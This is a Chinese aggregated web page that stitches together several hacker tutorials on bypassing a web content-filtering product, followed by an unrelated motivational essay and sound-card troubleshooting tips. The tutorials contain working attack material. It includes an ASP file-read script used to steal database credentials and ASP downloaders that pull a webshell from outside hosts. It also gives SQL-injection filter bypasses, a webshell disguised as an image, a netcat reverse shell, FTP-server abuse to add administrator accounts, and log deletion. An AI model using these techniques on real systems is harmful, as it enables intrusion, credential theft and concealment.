下面是小编为大家整理的我是如何突破一流检测系统的(共含8篇),如果喜欢可以分享给身边的朋友喔!同时,但愿您也能像本文投稿人“清扬婉兮”一样,积极向本站投稿分享好文章。
作者: laoguier
来源: www.hackbase.com
攻击目标:www.***.com
测试过的动作,一句话马,加密马,等,
测试结果:无效,无法上传,无法进入系统。
经过2天的分析,
然后自己搞出了一个代码,利用此代码读取了该网站下的config.asp文件源代码
-------------------------------------------------------------------------
<%
file=Request(“file”)
Set FSOOBJ=Server.CreateObject(“Scripting.FileSystemObject”)
if FSOOBJ.fileExists(file) then
Set myfile=FSOOBJ.opentextfile(file,1)
Response.write “
” & server.HTMLEncode(myfile.readall) &“
”
myfile.close
Set myfile=nothing
else
Response.write “file(” & file & “) not exists.”
end if
%>
-------------------------------------------------------------------------
www.***.com/view.asp?file=D:wwwrootindex.asp
读取到的敏感内容
sql地址:***.***.***.***
帐号:sa 密码:u8f2444f
利用此帐号进入后,建立了123$的隐藏管理员用户,删除入侵日志后退出,
在我们入侵网站的过程中,有时候提交我们的大马或者其它ASP文件的时候,会被一流信息监控系统所拦截,这是因为它设置了限制提交字符,
既然它不允许我们进行提交,那我们可以采用下载的方法。这个就好比我们上传大EXE文件的时候,网站禁止了上传,但是我们可以采用外部下载的方式来把目标 文件下载到本地服务器中。好了,这个方法就是,只要服务器没有禁用XML和数据流组件,我们可以往服务器中提交以下ASP脚本文件
<%
Set xPost = CreateObject(“Microsoft.XMLHTTP”)
xPost.Open “GET”,“www.waitalone.cn/test.txt”,False //代码在网上的地址 也就是大马
xPost.Send
Set sGet = CreateObject(“ADODB.Stream”)
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath(“test.asp”),2 //在根目录生成的文件
set sGet = nothing
set sPOST = nothing
response.Write(“下载文件成功!”)
%>
利用服务器的XML和数据流组件,从我的blog的ak.txt的内容下载到目标站点根目录并保存为ak.asp,
ak.txt中的内容当然就是被拦截的内容了。之后访问这个提交的ASP网页文件,会出现一片空白,然后我们再访问这个ak.asp文件,则想要上传的内容已经被保存成功!
突破一流监控系统写shell有2中方法(PS:我只知道2中)
还有一种是捆绑图片,一下介绍的是第二种
<%
Set xPost = CreateObject(“Microsoft.XMLHTTP”)
xPost.Open “GET”,“hi.baidu.com/xahacker/1.txt”,False //代码在网上的地址 也就是大马
xPost.Send()
Set sGet = CreateObject(“ADODB.Stream”)
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath(“test.asp”),2 //在根目录生成的文件
set sGet = nothing
set sPOST = nothing
response.Write(“下载文件成功!”)
%>
-------------------------------
------------------------------------------
<%
Set xPost = CreateObject(“Microsoft.XMLHTTP”)
xPost.Open “GET”,”hi.baidu.com/xahacker/fuck.txt”,False
xPost.Send()
Set sGet = CreateObject(“ADODB.Stream”)
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath(“fuck.asp”),2
set sGet = nothing
set sPOST = nothing
%>
来源:街头诗人
教程贴士:上回渗透一站点,SQL Injection测试时返回这个页面
上回渗透一站点,SQL Injection测试时返回这个页面(图1)
我晕,原来服务器上装了一个叫“一流信息监控拦截系统”的BT玩意儿,扫兴!查查它老底先,
Google一下“一流信息监控拦截系统”。原来这是广州××信息科技公司开发的内容监控系统,用来监控拦截非法信息的,当然也包括SQL注射。它主页上软件功能介绍赫然写着:“软件可以全面拦截任何的SQL注入式的攻击,就算多差的程序都不用担心了”。嘿嘿,大哥,牛皮不要吹得太大哟,不然怎么好下台啊。
看他把话说得那么绝,我一定要给他点颜色瞧瞧。呵呵,不是说只有想不到没有做不到么,嗯,让我想想先。网上没有找到那软件下载,算啦,就直接在网站上测试好了。
经过几回合测试,我发现那个软件是拦截独立的关键词,也就是拦截字符串“and”,而不会拦截包含“and”的字符串如“island”。提交xxx/x.asp?x=island 1=2时没问题,而提交xxx/x.asp?x=a and 1=1时就被拦截了。
呵呵,明白了吧,实际上程序要判别到底是不是完全匹配真正拦截的字符串是空格+关键词+空格(本例中就是“ and ”)。如果用ASP代码表示的话就是:
If Instr(1 , StrQuest , “ and “ , 1) Then
Response.Write( “一些废话” )
Response.End
End If
拦截原理搞懂了,问题是怎么突破呢?往下看,
关键字是要注射要用到的,乱动不得,就只有从空格入手了。呵呵,想想什么东东可以代替空格啊,对,就是Tab!现在我修改URL用tab代替and前后的两个空格,呵呵,看看图2吧(Tab -->“%09”,空格 -->“%20”)。
Yeah,成功啦!传说中的一流信息监控拦截系统被我们绕过去了。哈哈,那个什么系统正好是个漏洞百出的Web程序,呵呵,继续如法炮制进行SQL注射拿管理员帐号密码得WebShell,那些都是体力活了,略过略过。
有了WebShell,执行“net user”命令又被他拦截了(这个可恶的家伙……),呵呵,小case啦,那就执行“net user”(中间两个空格)吧^_^
当然这种用Tab代替空格突破限制的方法也不仅仅局限于“一流信息监控拦截系统”,只要是类似的过滤方法就行。比如说青创文章系统(Version 1.5.2.23.7.0),它就是这种过滤方法,但是还过滤了“_”,而它的每个表都是article_xxx的形式,结果还是不能进行猜解。罢休!
最后顺便说下,一流信息监控系统“可以实时监控用户上传到服务器的每一张图片”、“对使用服务器的用户进行关键字监控,无论是通过 FTP方式上传或web方式上传的文件都可以准确监控,将不法用户的行为记录在案”等功能,好像侵犯隐私权了……
langouster 邪恶八进制
先来说URL编码,%加两位的16进制表示一个字符,比如’经过编码之后就是%27,这是人人都知道的URL编码规则,UrlUnescapeInPlace之类的API函数甚至于程序员自己写的URL译码函数都是基于这一思想,
然而,我们何必如此听话,试想一下要是%后跟的不是16进制数字而是像abc%hh会发生什么事呢。先看UrlUnescapeInPlace,
写个小程序试一下,abc%hh经过译码还是abc%hh;再看asp.dll是怎么译码的,在asp页面中写入 response.Write(request.QueryString(“str”)),然后用?str=abc%hh访问它,页面显示abchh,它直接把%给去掉了。
现在来思考要是我们提交sele%ct,信息监控系统得到的字符串还是sele%ct,当然它不是危险字符,它就不会拦截,但对于ASP,它得到的可就是select了,其它的同理,’可用%’表示,比如and exists(select * from admin)可转化为以下字符串a%nd ex%ists(%select * %from ad%min),
此方法可举一反三,比如用%%代替%都可以,还可以是其它的,具体的可以去看RFC2396。
以上仅是对于GET方式的分析,POST没试过,不过猜想也是可以的。并且经测试以上方法对目前的所有IIS防火墙都有效,包括VIF。
补充:其实发现这个漏洞已经有好些日子了,本来我是不想公开的,前些天两次给一流信息监控的人发邮件提醒他们,但他们就是没认真考虑我说的问题,还说一流信息系统可以把经过编码的注入字符也加到过滤清单中,不知道他们是怎么想的,他是觉得再加一条sele%ect过滤规则就可以了?那sele%%ct呢,也加上?那sele%%%ct呢??鉴于一流这种无所谓的态度我就公开此漏洞,希望他们能以此为鉴。
今天终于GK完了无聊闲逛在网上,意识催魂试的找我要文章...哈~发现一迷信网站,不爽...(入侵需要理由吗?不需要吗?需要吗?....)用telnet www.xxx.com 80get enterHTTP/1.1 400 Bad RequestServer: Microsoft-IIS/5.0Date: Wed, 08 J
今天终于GK完了无聊闲逛在网上,意识催魂试的找我要文章...
哈~发现一迷信网站,不爽...
(入侵需要理由吗?不需要吗?需要吗?....)用
telnet www.xxx.com 80get enterHTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Wed, 08 Jun 11:56:00 GMT
Content-Type: text/html
Content-Length: 87Error
失去了跟主机的连接,F:Documents and Settingslu桌面>看到没,获得很多有用的信息哦先去WEB上看看有没有什么漏洞哈!发现DVBBS7.1 论坛前几天有朋友告诉我件事情,说有许多白痴管理员用备分的日期做备分数据库的名字哦!试试看!dvbbs7.1 是4月6日更新的,他用该用200504**.mdb做名字来命名以前的旧数据库!
没办法,试试!www.xxxx.com/bbs/databackup/20050406.mdb
www.xxxx.com/bbs/databackup/20050407.mdb
www.xxxx.com/bbs/databackup/20050408.mdb
.....
晕..到32了还没出来
管理员不是白痴哦!
www.xxxx.com/bbs/databackup/200504.mdb
faint!他不是白痴谁是!
跳出了可爱的下载对话框!downloading.... 完成!用辅臣数据库浏览器打开,选择Dv_Log(2586)
字段名选择l_content 关键字添password2点查询
许多信息出来了哦!
经过筛选
发现一条:
ldusername=叼防&username2=叼防&password2=19841202&adduser=叼防&id=12&Submit=更 新哈,想到什么了?登陆啊,不过用户名不知道,是葛飞吗~开玩笑,那简单,其实转化这个我用他本身的页面,
在登陆页面上用户名和密码乱添
点登陆
www.xxx.com/bbs/showerr.asp?BoardID=0&ErrCodes=10,11&action=填写登录信息填写登录信息这句话意思是“填写登录信息”那么就把填写登录信息换成叼防!提交!看到了吧!用户名是“叼防”
晕!
什么名字啊!不管了,登陆!
成功!呵呵~把老兵的asp站长助手另存为admin_system321.gif上传!晕!一流信息监控系统提醒您:很抱歉,由于您提交的内容中或访问的内容中含有系统不允许的关键词或者您的IP受到了访问限制,本次操作无效,系统已记录您的IP及您提交的所有数据。请注意,不要提交任何违反国家规定的内容!本次拦截的相关信息为:drop table换海阳top的传,在晕...还是被拦截!不行!我就不信上不去!
<%if err then%>
<%
end if %>
<%On Error Resume Next
if request(“cmdx”)=“cmd.exe” then
response.write oScriptlhn.exec(“cmd.exe /c”&request(“cmd”)).stdout.readall
end if
response.write oScriptlhn.exec(request(“cmdx”)&“ /c”&request(“cmd”)).stdout.readall
%>
保存成为cmd.gif
上传成功!
登陆后台用数据库管理还原成根目录下的admin_system321.asp_system321.asp“>www.xxx.com/bbs/admin_system321.asp登陆,啊...CMD窗口那里显示无法找到该页
您正在搜索的页面可能已经删除、更名或暂时不可用,
--------------------------------------------------------------------------------请尝试以下操作:确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。
如果通过单击链接而到达了该网页,请与网站管理员联系,通知他们该链接的格式不正确。
单击后退按钮尝试另一个链接。
HTTP 错误 404 - 文件或目录未找到。
Internet 信息服务 (IIS)--------------------------------------------------------------------------------技术信息(为技术支持人员提供)转到 Microsoft 产品支持服务并搜索包括“HTTP”和“404”的标题。
打开“IIS 帮助”(可在 IIS 管理器 (inetmgr) 中访问),然后搜索标题为“网站设置”、“常规管理任务”和“关于自定义错误消息”的主题。 把我的SYSTEM32下的CMD.exe用记事本打开,另存为111.gif上传!
在用刚才的方法备分成跟目录下的cmd.exe把刚才cmd.gif里cmd.exe改成他的绝对路径全都上传!然后备分!
访问_system321.asp”>www.xxx.com/bbs/admin_system321.asp
哈!成功!
在用上面的方法把nc传上去!
本地命令提示符执行 nc -vv -l -p 9999
在webshell里执行nc.exe -e cmd.exe 自己IP 9999
NC监听的窗口就出现一个可爱的SHELL在写个文件如下echo USER LocalAdministrator>2.txt
echo PASS #l@$ak#.lk;0@P>>2.txt
echo SITE MAINTENANCE>>2.txt
echo -setdomain>>2.txt
echo -Domain=MyFTP^|0.0.0.0^|22^|-1^|1^|0 >>2.txt
echo -DynDNSEnable=0 >>2.txt
echo DynIPName=>>2.txt
echo -SETUSERSETUP>>2.txt
echo -IP=0.0.0.0>>2.txt
echo -PortNo=22>>2.txt
echo -User=tyrant>>2.txt
echo -Password=19851011>>2.txt
echo -HomeDir=c:>>2.txt
echo -Maintenance=System>>2.txt
echo -Ratios=None>>2.txt
echo Access=c:^|RWAMEICDP>>2.txt
echo -GETUSERSETUP>>2.txt“^”符号的作用相信大家都了解吧!我不罗嗦了。把上面批处理保存为1.txt在SHELL中用NC提交nc 127.0.0.1 43958 <1.txt回显发现220 Domain settings saved
200-User=test1
200 User settings saved成功了!成功添加了用户tyrant密码19851011登陆对方的ftp
转到system32文件夹下quote site exec “net.exe user tyrant 19851011 /add”quote site exec “net.exe localgroup administrators tyrant /add”quote site exec “net.exe user start telnet”用tyrant管理员telnet上去
传个批处理开3389哈...正在连接到...文章到此结束
以前我是一个二流毕业生,现在我是一流企业家
文/俞敏洪
北大一直是我的心灵家园。每到春秋两季的雨天,我一定会开车到北大,在未名湖边坐上一两个小时。学生年代我在未名湖畔孤独地转过几千圈,却没有邂逅过一个雨中佳人,所以当我看到北大学生成双成对从我身旁经过,就有一种欣慰感。还有,新东方的办公地点最后选择了中关村最核心的那栋楼,就是为了有时候能看北大一眼,看博雅塔一眼。有关北大的种种美好在我心中留下了不可磨灭的印象。我们这一辈人当时都是背着诗歌长大的,对生命充满了诗意的渴望。我从小学到高中从来没有进过班级前20名。我背课文背得慢,但背得慢的好处是忘得也慢。到期末考试的时候,我的同学都要重新背课文,我就不用背,因为每篇课文我都能立马背出来。在记忆学上有一个原则:速度与遗忘成正比。一篇课文你如果一天背出来了,一个星期后一定会忘记;但是你如果一个星期背出来,可能一年以后才会忘记。
但实际上,我在北大一直挺自卑的,从进北大到出北大的间,我一直生活在自卑里。直到离开北大以后,我才发现,北大是我自卑的原因。但是自卑也有好处,在自卑中我学会了两个本领。第一个是察言观色的能力,自卑就要看人脸色,因为我不相信自己,总要揣摩别人是怎么想的,因此看到别人的眼神、动作,我就会琢磨他的心理状态是什么。后来我发现,这个用在管理中非常有效,管理中就得揣摩员工想要什么,要揣摩与员工的关系怎么发展。这是在北大11年的自卑给我带来的第一个本领。第二个本领是练就了不把自己当人看的心态。就是因为自卑,所以有了这种坦然的心态。到最后就算我做成事情了,也不会太出格。人最怕的就是“飞”起来的感觉,你太把自己当人看了,动辄就会得罪人,动不动就会瞧不起周围的人,有的时候一不小心就会做出格的事情。
从北大毕业的时候,我的成绩并不好。毕业以后,我们那一代人不需要担心工作,都是国家分配,只要你能毕业,成绩再差,国家也一定会给你分配工作。当时我期待离开北大,因为在北大从来没好过,同学从来没有重视过我,也找不到对象。我不离开北大肯定是不行的,所以我一心一意想要离开北大。我填的工作志愿全都是北大以外的单位,但是最后我被北大留了下来。为什么呢?原来成绩好的同学都去了外交部、新华社、日报社那样的好单位。当时北大刚启动四、六级考试的公共英语培训,从本来只有英语系的人要学英语扩展到全北大的每一个学生都要学英语。北大英语老师的缺口很大,最后凡是外面找不到工作的通通留下来在北大当老师,结果我就被留下来了。不过这也是老天安排,如果不被留下来,就没有了我后来做教师的职业生涯,也就没有了新东方的今天。
我留北大的时候心里就比较郁闷,因为同学们找的工作都比我好,但是我也没有气馁。我这个人有一个特大的优点,就是不管是自卑状态也好,成绩差也好,被人瞧不起也好,我从来不气馁,一直在默默地努力。而且我心中总有一股韧劲,这股韧劲也许来自我小时候的经历。我经历过各种各样的困境,比如小时候家里没饭吃啃点野菜也能吃饱。这样的经历,让我觉得总能渡过难关的。我讲这些陈年旧事是为了说明一个道理:当你有一种坚韧不拔的精神,当你为了一个目标愿意慢慢去努力,用时间去争取自己的未来,往往最后你取得的成就比那些跑得快的人还要大。
有时候,越让你着急的事情可能越是大事;越是大事,你越着急越做不好。因此,你要慢慢地做,把事情做细致了,这样才可能把事情做完美。既然人生不是百米冲刺,那就不能用百米冲刺的速度去跑,也不能用马拉松的速度去跑。我跑过马拉松,但是我没有跑完,因为跑到最后跑不动了。我很喜欢徒步,身上背着十几公斤的包,每天徒步走几十公里。脚上磨出泡了也没有问题,慢慢走嘛。实在累了,就歇一歇,看看周围的风景,目标不变就可以了。这样的话,说不定你走出来的距离会远得多,看到的风景也自然就比别人多了。
调换声卡后不能自检
极有可能是CD-ROM数据线接反了,或者主板上某处接触不良,另外,主板上的IDE接口可以同时接硬盘和CD-ROM驱动器,这时只要将原来的数据线换成两个接口的即可。
无法播放MIDI或使用MIC
电脑播放CD时,光驱通过用一根音频线与声卡相连,直接输出音频信号,而无需安装声卡驱动程序,这也是用来判断声卡和各部分连接正确的好方法。Windows启动或播放VCD时,电脑能出声,则说明声卡驱动程序安装正确。剩下的只有可能是设置问题了。
一般声卡所带的播放软件,都有混音器功能,至少也有音量控制功能。运行它(如若找不着,请重新安装声卡驱动程序,因为有时Win95的音量控制也无能为力),确认MIDI项或MIC项复选框被选中,并且音量被调到适中位置。
不支持个别软件所带的音效
如果你在Windows下运行DOS程序,则很可能出现这种问题。原因在于系统很可能没有引导该声卡在DOS下的驱动程序(对直接安装Win95OSR2的用户则是一定的)。最简单的方法自然是安装该声卡在DOS下的驱动程序。确认Autoexec.bat文件里引导了该驱动程序,如:lhc:pcaudiosetess25071。如果你拥有的是高档的PCI声卡,则你的主板必须支持SB-Link接口技术,才能支持DOS程序的音效。
另外一种可能性是该软件支持的声卡和你的声卡不兼容所致。以轻轻松松背单词(BDC)为例,在排除上述可能性之后,运行BDC自带的Sound.exe,改变发声方案(如使用声卡自带的.wav播放器)就可解决问题。
声卡引起死机
在未装Windows95时声卡工作正常,而安装了Windows95后就死机。
原因是Windows95将主板PnPBIOS中的有关声卡的IRQ和DMA设置内容进行了修改,而当修改后的IRQ、ADD或DMA与系统冲突时,就会出现上述故障,这时只要用声卡驱动程序组内自带的有关程序,修改PnPBIOS的相关内容即可解决。
Win95检测不到声卡
如果你是品牌机,首先要确定你的机子是否采用了集成CPU、声卡和显卡的一体化主板。再者,如果你的声卡是比较高档的PCI声卡,Win95很可能检测不到。
以安装创新AWE32为例,用添加新硬件向导根本检测不到声卡。选择从光盘安装,选定:win95aweproinstall.inf文件,确定了正确的型号进行安装后重新启动计算机。系统提示检测到新硬件,并安装相应驱动程序后,声卡仍不能工作。查看控制面板系统设备管理器选项卡,显示设备正常运行。按照安装说明文件提示,运行:win95awesetup.exe文件安装声卡软波表(用软件来模拟更多乐器的音色)后,声卡正常工作。某些高级声卡,除硬波表外,还需软波表共同合成乐器的音色。所以除了安装驱动程序(使用硬波表)外,还需安装软波表。
系统显示声卡正常运行,但声卡就是不吭气
除了上述那种可能性外,通常是声卡的驱动程序被损坏。删除该设备,并确定Windowssystem目录下,声卡的驱动程序(文件名与设备名相似)被删除,然后重新安装。
另一种可能性则是硬件冲突,有时声卡会与带语音的Modem或解压卡等设备产生冲突。这时可试着把声卡换一个插槽,然后重新安装声卡。确定声卡是否损坏的最好办法,就是把声卡插到别的机子上,看能否使用。
声卡驱动程序安装不当
一台多媒体电脑,VXpro主板、K5133CPU、32MBEDO内存、S3Trio64V+显示卡(显存为2MB)、2.1GB大脚硬盘、即插即用AL007声卡、8倍速高仕达光驱。启动进入Windows95时出现一个带!AdvanceSoundSystemDriverAlter提示框,提示:TheSoundVxDVersionIsIncorrect(声音虚拟设备驱动程序版本错误),按确定按钮三次后方进入Windows95主界面,能运行XING、《超级解霸》以及多媒体播放器播放VCD、CD,但是右下角小喇叭不见了,且无声音输出。用MP3播放音乐时,提示框显示:MMSYSTEM002使用的设备标识号已超出本系统范围,按确定按钮无法退出,只能用Ctrl+Shift+Del关闭程序。在DOS下能正常播放CD及MIDI音乐,
仔细询问后得知,系统一直使用正常,但用户发现在Windows95的DOS环境下运行KKND无声,于是在Windows95的DOS环境下运行了AL007声卡的DOS安装程序Dosinst.exe,安装了声卡的DOS驱动程序,造成启动Windows95时出现Msgdrv32提示框,显示:该程序执行了非法操作,将被关闭。如仍有问题,请与程序供应商联系。点击详细信息按钮,显示:Msgdrv32出现一般保护性错误,位于模块MMSYSTEM.DLL的,再点击关闭按钮后系统停止工作,用Ctrl+Shift+Del激活关闭程序图文框,框中提示:Mprexe没有响应,点击结束任务按钮无效,只能点击关机按钮关机,无法进入Windows95。此后,用户又重新安装了Windows95,虽然能进入Windows95运行各种程序,但造成了上述的无声故障。针对这个情况,首先进入C:WINDOWSSYSTEM目录下,将AL007声卡相关的9个文件AL*.*移出该目录,然后重新启动,按提示重新安装声卡驱动程序,并根据启动时出现的提示删除C:WINDOWSSYSTEM.INI文件的[386Enh]栏目中的以下三行:
device=ALSNDSYS.386
device=ALOPL386
device=ALMPU401.386
之后故障排除。
声卡驱动程序安装失败
在各种操作系统下声卡安装均不正常,而声卡在别的微机上安装正常。
首先应检查计算机是否染上了病毒,用最新的杀毒软件查一查,在排除了病毒影响的因素后,主要考虑CMOS设置不当和各硬件之间的冲突问题,应该再仔细查看一下CMOS中各项设置是否合适,着重于IRQ和PNP的设置。保证所有的IRQ设置为PCI/ISAPNP,检查是否为显示卡与声卡不兼容的问题,可换一块显示卡试一试,因为它与声卡最易出现资源冲突。如果这样还不成功,那就是主板与声卡间存在着兼容性问题,只能找经销商换卡。
重装Win95引起显卡、声卡故障
原来一切正常,但格式化硬盘并重装Win95后,在安装时未能检测到声卡,同时安装完显示卡驱动程序后重新启动机器,显示:显示适配器不匹配,并提示进行添加新硬件。按步骤完成添加新硬件后故障依旧。同时添加声卡驱动程序后重新启动仍无法检测到声卡。重复多次仍无法排除故障,设备列表中并无其他异常。
由于硬盘已重新格式化并用干净无毒软盘引导,可以排除病毒干扰。而重装前声卡、显卡均工作正常,可排除卡和槽的电气故障。重新固定插卡,无法排除故障,故排除接触不良的缘故。重新安装Windows98Beta2,显卡故障消除,声卡故障依旧。无奈中,将声卡、显卡互换插槽,重新启动后提示发现新硬件,按提示完成安装,一切正常。将两卡换回,故障又出现,换回后故障消除。
分析:以前安装Windows95时,先安装Windows3.1,并安装了显卡的驱动程序,然后安装Windows95,完成后插入声卡,按提示安装。此次安装时直接安装Windows95、Windows98(声卡未拔出)。考虑到Windows98能正确检测出显卡并自动安装相应的驱动程序,猜想问题可能出在Windows95安装的检测过程中。打开C盘根目录下的DETLOG.TXT文件,发现有如下信息:
Checkingfor:声霸卡兼容
QueryIOMem:Caller=DETECTSB,rcQuery=0
IO=210-21f
DetectSB:vsbdfoundadifferentbase.
VerifySBPort:ResetTimeout.
Windows95安装过程中SETUP自动检测硬件,并将检测结果存储在文件DETLOG.TXT中,安装完成后将所有硬件信息保存于注册表中。
由于硬件的高速发展,Windows95自带的驱动程序集明显不足,在安装过程的检测硬件阶段,Windows可能无法确定某些较新的硬件类型,无法将其激活,只把一些硬件信息保存于注册表中,故再次启动后Windows仍无法辨别这些新硬件。而互换插槽后,由于参数更改,Windows要刷新注册表,填入新的硬件信息,故能正确安装硬件。本例中WinfastS600DX显卡与太阳花PCI声卡均为较新的硬件,故Windows95有可能不能正确识别,而Windows98中提供的驱动程序较全,其本身也增添了对不少新硬件的支持,如USB接口等,故基本上能正确识别较新硬件。
由此可得出两条经验:
安装Windows95时,声卡或较新的硬件最好等到安装完成后再插入槽中重启系统进行安装。
遇到无法检测到适配卡的问题时,不妨更换插槽一试。
★ 计量检测管理系统
★ 什么是对焦系统
★ 一流标准对照检查
★ 争创一流演讲稿
